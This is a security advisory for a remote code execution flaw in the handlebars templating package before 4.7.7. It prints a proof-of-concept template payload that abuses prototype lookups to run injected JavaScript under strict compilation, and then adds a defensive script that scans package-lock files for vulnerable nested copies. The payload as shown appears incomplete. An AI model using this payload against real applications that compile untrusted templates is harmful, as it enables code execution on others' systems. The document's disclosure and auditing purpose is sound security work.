Remote Code Execution (RCE) Affecting handlebars package, versions <4.7.7



    Attack Complexity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 5.85% (93rd percentile)
9.8 critical
Red Hat
9.8 critical

  • Snyk ID SNYK-JS-HANDLEBARS-1056767
  • published 15 Feb 2021
  • disclosed 8 Jan 2021
  • credit Francois Lajeunesse-Robert

How to fix?

Upgrade handlebars to version 4.7.7 or higher.


handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when certain compile options are used to compile templates that come from an untrusted source.


<script src=""></script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
var template = Handlebars.compile(s, { 
strict: true 
// execute the compiled template and print the output to the console
console.log(template({}));
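The practical question for a defender is whether any copy of handlebars in a dependency tree still sits below the fixed version 4.7.7, including nested copies pulled in transitively that a top-level `package.json` pin does not cover. The following is an added example written for this page, not code from the advisory or from the handlebars project: it parses semver strings numerically (so 4.10.0 is correctly ranked above 4.7.7), flags versions below 4.7.7, and walks a package-lock `packages` map to report every handlebars entry. The lockfile contents are constructed for illustration; the package names in it are hypothetical.

```javascript
// Added example (not from the Snyk advisory or the handlebars project):
// flag handlebars versions below the fixed release and locate every copy
// of handlebars in a package-lock.json "packages" map (lockfileVersion 2/3).

const FIXED_VERSION = '4.7.7'; // fix version stated in the advisory

// Parse "MAJOR.MINOR.PATCH[-prerelease][+build]" into numbers; null on junk.
function parseSemver(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(String(version).trim());
  if (!m) return null;
  return { major: +m[1], minor: +m[2], patch: +m[3], prerelease: m[4] || null };
}

// Returns -1, 0 or 1. The numeric core is compared field by field; a
// prerelease of X.Y.Z ranks below the X.Y.Z release, as in semver ordering,
// so "4.7.7-beta.1" is treated as predating the fix.
function compareSemver(a, b) {
  for (const k of ['major', 'minor', 'patch']) {
    if (a[k] !== b[k]) return a[k] < b[k] ? -1 : 1;
  }
  if (a.prerelease && !b.prerelease) return -1;
  if (!a.prerelease && b.prerelease) return 1;
  return 0;
}

// True when the given handlebars version is inside the affected range (< 4.7.7).
function isVulnerableHandlebars(version) {
  const v = parseSemver(version);
  if (!v) throw new Error(`unparseable version: ${version}`);
  return compareSemver(v, parseSemver(FIXED_VERSION)) < 0;
}

// Walk the lockfile's "packages" map (keys are node_modules paths) and report
// every handlebars copy, nested ones included, with a verdict for each.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const isHandlebars =
      path === 'node_modules/handlebars' || path.endsWith('/node_modules/handlebars');
    if (isHandlebars) {
      findings.push({ path, version: meta.version, vulnerable: isVulnerableHandlebars(meta.version) });
    }
  }
  return findings;
}

// Constructed sample lockfile (hypothetical project and dependency names):
// the direct dependency is already on the fixed version, but a transitive
// dependency carries its own stale nested copy.
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', dependencies: { handlebars: '^4.7.7' } },
    'node_modules/handlebars': { version: '4.7.7' },
    'node_modules/some-report-tool': { version: '1.0.0', dependencies: { handlebars: '~4.5.0' } },
    'node_modules/some-report-tool/node_modules/handlebars': { version: '4.5.3' },
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  console.log(`${f.path}@${f.version}: ${f.vulnerable ? 'VULNERABLE (upgrade to >= 4.7.7)' : 'ok'}`);
}
```

Run against a real `package-lock.json` by replacing `SAMPLE_LOCK` with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`; the nested-copy case is the one that an `npm ls handlebars` glance at the top level tends to miss, and it is exactly the case where `npm audit` or an SCA tool reports the advisory even though the direct dependency looks patched.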